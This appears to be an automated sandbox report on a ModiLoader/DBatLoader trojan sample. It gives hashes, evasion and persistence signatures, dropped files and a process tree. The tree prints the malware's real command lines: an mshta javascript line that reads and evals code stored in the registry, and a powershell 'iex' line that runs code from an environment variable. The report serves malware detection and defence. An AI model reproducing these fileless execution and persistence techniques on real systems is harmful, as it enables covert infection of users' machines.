Overview

overview

10

Static

static

3

dac220745d...18.exe

windows7-x64

10

dac220745d...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    11-09-2024 16:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    dac220745dee4b3b959d6214b687784f_JaffaCakes118.exe

  • Size

    263KB

  • MD5

    dac220745dee4b3b959d6214b687784f

  • SHA1

    113fe0b0df8597f117157f7982f96f46fb19f84f

  • SHA256

    22d8572551321cae4b8542299bf6d9c7ab3dd35eb90edbb00a743b312a11e34d

  • SHA512

    0f72903184464b820dc696bdc1ebc9e9d64395d7f54664eb1c61772a40235d4837fa8063547da3bb74cd12712218f640346f8b5b8372ef39cc81c049d54c6aa5

  • SSDEEP

    3072:lGnDU4dmFrSvLWG88MOE+cjqr3au5llnt6pCO4d+Lk24SBXpjihtly8rj3EY0Nk0:HVmLW/8MCp5llt6wFd5oPji7r5yTh34K

Score
10/10
modiloaderdiscoveryevasionexecutionpersistencetrojan

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

    trojanmodiloader
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
    evasion
  • ModiLoader Second Stage 59 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\dac220745dee4b3b959d6214b687784f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\dac220745dee4b3b959d6214b687784f_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2812
    • C:\Users\Admin\AppData\Local\Temp\dac220745dee4b3b959d6214b687784f_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\dac220745dee4b3b959d6214b687784f_JaffaCakes118.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2680
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:vQJ5PJ="Sq";N4Q=new%20ActiveXObject("WScript.Shell");WbWQT1="mnm";rNIL97=N4Q.RegRead("HKLM\\software\\Wow6432Node\\qwqazVqC\\BzsDBSUn0G");ven9oQj2="RWDr1";eval(rNIL97);y7pTFzR="GjRL";
    1⤵
    • Process spawned unexpected child process
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2584
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:phjxcqb
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32.exe
        3⤵
        • Looks for VirtualBox Guest Additions in registry
        • Looks for VirtualBox drivers on disk
        • Looks for VMWare Tools registry key
        • Checks BIOS information in registry
        • Deletes itself
        • Drops startup file
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\SysWOW64\regsvr32.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1736

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\433fb8\240497.bat
    Filesize

    61B

    MD5

    1d06860b64c4072361d52f6a00c431ca

    SHA1

    db14a9606b1890be159fcee77408318872015d08

    SHA256

    2c651141246b4d81ff4ee6cc84ffb5625bead8968fb9f2112d6ba969461d7947

    SHA512

    6d76ff1f738c611f8f8f269c60ee9440e85b80517226f27d87c279e0d05f0682e71a48b8d176da69be34fd6e7d5102d7e3ba153c6209218f714056fb0c857a11

    Download Submit

  • C:\Users\Admin\AppData\Local\433fb8\9e8496.lnk
    Filesize

    881B

    MD5

    c606d77b4f2df6c4cb6fa641b0a69628

    SHA1

    e1501668d3c5276a45a3b202df2dcd36ff137a3e

    SHA256

    452819d40c9cbf724841a566933fd9aafbca6ab3038dc00624c5da18aadc2f9f

    SHA512

    cbdc9fad4a853325c50f774eed707a462decf3bdb04fc0a9f2c6a65910ef05f2266e6216341c2b451ce1648cb1b13827015564905444c1f6c23f31f76f5ce5c9

    Download Submit

  • C:\Users\Admin\AppData\Local\433fb8\ab2c43.21b5e51
    Filesize

    27KB

    MD5

    7d7c73ac17c722b848cbc64fb3fda747

    SHA1

    7c612b8c87c928f752543dc9a9b2353a52651914

    SHA256

    25edffa632bf3ac9f18821f8dd795bb53e6d66cdc20ce0e867801d240da8e097

    SHA512

    9fea5d83dadd1d4d85e98512cd4014f4a6c0a1b65c34be8155e24703d87baa7124aa0a5b16315f421d75485787871d5e1547c54f5a0c92db0c3b0b3dbec93681

    Download Submit

  • C:\Users\Admin\AppData\Roaming\5ac6dc\097814.21b5e51
    Filesize

    7KB

    MD5

    ee3161de6b3db86ad5677dcf2094c1ce

    SHA1

    f81cc6e2c932312bef2184bf9701fe113f4bb3b1

    SHA256

    d611a396aa90d4f54f81a7bc2d068d0ef51be49637b7431faccd8b64253819f3

    SHA512

    568210e6981755ba1e211376c167b560e0e9146cbb36c320f21dea2dc68513d02fdb8fcebcec9130cd221f2d9c4d631e597610f073688c5874fd6e473a7c1304

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b719cc.lnk
    Filesize

    991B

    MD5

    6a9fc8355c78e715d713320ea6a56bbe

    SHA1

    15ed149ff0348f085c7eac331c5b65e1b723d476

    SHA256

    429eab8a0ac9bcb23e26b186eda420533a4d86c714a39bd05580441b8b570ec2

    SHA512

    b712121554d1654fb4fdeda7bc56eb59e3c18a7ce0aab6300dcff2bea30d164636ffcfd1fb6ade194827aaff16362f3e9bd4775b52b081188e3aa2a22784c5cf

    Download Submit

  • memory/1736-71-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-67-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-68-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-69-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-70-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-82-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-72-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-73-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-74-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-75-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-76-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-77-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-78-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-79-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-80-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1736-81-0x0000000000170000-0x00000000002B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-42-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-25-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-33-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-46-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-58-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-56-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-66-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-64-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-55-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-54-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-49-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-48-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-47-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-57-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-45-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-44-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-32-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-31-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-30-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-28-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-27-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-35-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-36-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-37-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-38-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-39-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-40-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-23-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-43-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-41-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-34-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1836-29-0x0000000000260000-0x00000000003A1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2648-26-0x0000000006220000-0x00000000062F6000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2648-22-0x0000000006220000-0x00000000062F6000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2680-2-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

    Download

  • memory/2680-12-0x0000000001DC0000-0x0000000001E96000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2680-11-0x0000000001DC0000-0x0000000001E96000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2680-8-0x0000000001DC0000-0x0000000001E96000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2680-9-0x0000000001DC0000-0x0000000001E96000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2680-7-0x0000000001DC0000-0x0000000001E96000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2680-6-0x0000000001DC0000-0x0000000001E96000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2680-5-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

    Download

  • memory/2680-4-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

    Download